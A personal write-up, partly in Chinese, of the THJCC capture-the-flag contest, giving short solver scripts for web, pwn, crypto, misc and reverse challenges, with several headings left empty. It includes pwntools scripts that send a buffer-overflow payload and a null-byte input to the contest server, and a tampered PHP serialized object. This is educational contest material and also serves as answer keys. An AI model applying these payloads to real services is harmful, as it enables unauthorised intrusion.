# THJCC Write-Ups
可惡,這次時間撞爛了,第一天打在十名左右,第二天要當助教所以不得不睡覺,睡了四個小時起來,結果掉到20名。在火車上面勉強hold住名次,結果營隊的新手對資安幾乎沒接觸過,要一個個一對一輔導,還幫他們整理筆記,然後我就炸裂了。回到家30多名,趕在最後兩個小時拉回去前30。
## WarmUp
### Welcome
ctrl+c & ctrl+v
### beep boop beep boop
### Discord Challenge
## WEB
### Headless
### Nothing here
### APPL3 STOR3
### Lime Ranger
```
a:2:{s:2:"UR";i:5;s:3:"SSR";i:5;}
```
## PWN
### Flag Shopping
### Money Overflow
```
from pwn import *
conn = remote('chal.ctf.scint.org', 10001)
payload = b'A' * 20 + p16(65535) + b"\n"
conn.sendlineafter(b'Enter your name: ', payload)
conn.interactive()
```
### Insecure Shell
```
from pwn import *
io = remote("chal.ctf.scint.org", 10004)
io.sendline(b'\x00')
io.interactive()
```
## MISC
### network noise
### Seems like someone’s breaking down
```
grep -Ei 'THJCC|base64|[a-zA-Z0-9+/=]{20,}' app.log
```
## Crypto
### Twin
```
from Crypto.Util.number import *
from math import isqrt
N = 28265512785148668054687043164424479693022518403222612488086445701689124273153696780242227509530772578907204832839238806308349909883785833919803783017981782039457779890719524768882538916689390586069021017913449495843389734501636869534811161705302909526091341688003633952946690251723141803504236229676764434381120627728396492933432532477394686210236237307487092128430901017076078672141054391434391221235250617521040574175917928908260464932759768756492640542972712185979573153310617473732689834823878693765091574573705645787115368785993218863613417526550074647279387964173517578542035975778346299436470983976879797185599
e = 65537
C = 1234497647123308288391904075072934244007064896189041550178095227267495162612272877152882163571742252626259268589864910102423177510178752163223221459996160714504197888681222151502228992956903455786043319950053003932870663183361471018529120546317847198631213528937107950028181726193828290348098644533807726842037434372156999629613421312700151522193494400679327751356663646285177221717760901491000675090133898733612124353359435310509848314232331322850131928967606142771511767840453196223470254391920898879115092727661362178200356905669261193273062761808763579835188897788790062331610502780912517243068724827958000057923
p = isqrt(1 + N) - 1
q = p + 2
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(C, d, N)
flag = long_to_bytes(m)
print(flag)
```
### Frequency Freakout
https://quipqiup.com
### snake
```
def decrypt_symbol_string(s):
symbol_table = "!@#$%^&*(){}[]:;"
bit_string = ""
for c in s:
idx = symbol_table.index(c)
bit_string += f"{idx:04b}"
chars = [chr(int(bit_string[i:i+8], 2)) for i in range(0, len(bit_string), 8)]
return "".join(chars)
encrypted = input()
original = decrypt_symbol_string(encrypted)
print(original)
```
### DAES
```
from Crypto.Cipher import AES
test = b'you are my fire~'
out1 = bytes.fromhex(input())
out2 = bytes.fromhex(input())
def pad_key(i):
return b'whalekey:' + str(i).encode()
# Step 1: 嘗試所有可能 key1
enc1_dict = {}
for i in range(1000000, 2000000):
key1 = pad_key(i)
cipher = AES.new(key1, AES.MODE_ECB)
mid = cipher.encrypt(test)
enc1_dict[mid] = i
# Step 2: 嘗試所有可能 key2,看看能不能對 out1 解密回 enc1
for j in range(1000000, 2000000):
key2 = pad_key(j)
cipher = AES.new(key2, AES.MODE_ECB)
try:
mid = cipher.decrypt(out1)
except:
continue
if mid in enc1_dict:
key1_guess = pad_key(enc1_dict[mid])
print(f"Found keys!\nkey1 = {key1_guess}\nkey2 = {key2}")
break
cipher1 = AES.new(key1_guess, AES.MODE_ECB)
cipher2 = AES.new(key2, AES.MODE_ECB)
mid = cipher2.decrypt(out2)
target = cipher1.decrypt(mid)
print(f"target = {target.hex()}")
```
## Reverse
### Python Hunter
```
d = [
48, 39, 37, 49, 28, 16, 82, 17, 87, 13,
92, 71, 104, 52, 21, 0, 83, 7, 95, 28,
55, 30, 11, 78, 87, 29, 18
]
k = 'door_key'
def qwe(abc, xyz):
r = []
l = len(xyz)
for i in range(len(abc)):
t = chr(abc[i] ^ ord(xyz[i % l]))
r.append(t)
return ''.join(r)
flag = qwe(d, k)
print(f"flag{{{flag}}}")
```
### 西
```
encrypted = [
0xa1, 0xbd, 0xbf, 0xb6, 0xb6, 0x8e, 0xa1, 0x9d, 0xc4, 0x86,
0xaa, 0xc4, 0xa6, 0xaa, 0x9b, 0xc5, 0xa1, 0xaa, 0x9a, 0x97,
0x93, 0xa0, 0xd1, 0x96, 0xb5, 0xa1, 0xc4, 0xba, 0x9b, 0x88
]
flag = ''.join(chr(b ^ 0xF5) for b in encrypted)
print(flag)
```
# Feedback
## Feedback
https://ctf.scint.org/files/06e8ef9ce8cf27ca520432e3d10f9417/flag.png
Sign in with Wallet
Connect another wallet